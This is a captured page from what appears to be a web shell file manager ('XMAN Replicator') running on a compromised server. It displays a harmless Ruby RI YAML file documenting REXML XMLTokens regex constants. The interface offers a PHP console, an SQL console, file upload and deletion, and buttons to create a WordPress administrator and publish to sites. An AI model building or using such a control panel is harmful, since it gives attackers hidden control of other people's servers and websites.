🛸 XMAN Replicator
English
Русский
Français
Quit
Path:
/
opt
/
alt
/
ruby18
/
share
/
ri
/
1.8
/
system
/
REXML
/
XMLTokens
/
📋 نشر إلى المواقع
👤 إنشاء مشرف WP
Upload
Make directory
Name
Size
Rights
Date
Actions
[.]
<DIR>
drwxr-xr-x
2024-03-03 22:50
🔄
🗑️
🗑️📁
⬇️
🔒
[..]
<DIR>
drwxr-xr-x
2024-03-03 22:50
🔄
🗑️
🗑️📁
⬇️
🔒
cdesc-XMLTokens.yaml
988 B
-rw-r--r--
2023-07-26 13:47
✏️
🔄
🗑️
⬇️
🔒
Edit: cdesc-XMLTokens.yaml
--- !ruby/object:RI::ClassDescription attributes: [] class_methods: [] comment: - !ruby/struct:SM::Flow::P body: Defines a number of tokens used for parsing XML. Not for general consumption. constants: - !ruby/object:RI::Constant comment: name: NCNAME_STR value: "'[\\w:][\\-\\w\\d.]*'" - !ruby/object:RI::Constant comment: name: NAME_STR value: "\"(?:#{NCNAME_STR}:)?#{NCNAME_STR}\"" - !ruby/object:RI::Constant comment: name: NAMECHAR value: "'[\\-\\w\\d\\.:]'" - !ruby/object:RI::Constant comment: name: NAME value: "\"([\\\\w:]#{NAMECHAR}*)\"" - !ruby/object:RI::Constant comment: name: NMTOKEN value: "\"(?:#{NAMECHAR})+\"" - !ruby/object:RI::Constant comment: name: NMTOKENS value: "\"#{NMTOKEN}(\\\\s+#{NMTOKEN})*\"" - !ruby/object:RI::Constant comment: name: REFERENCE value: "\"(?:&#{NAME};|&#\\\\d+;|&#x[0-9a-fA-F]+;)\"" full_name: REXML::XMLTokens includes: [] instance_methods: [] name: XMLTokens superclass:
Save
PHP Console
Execute
SQL Console
Execute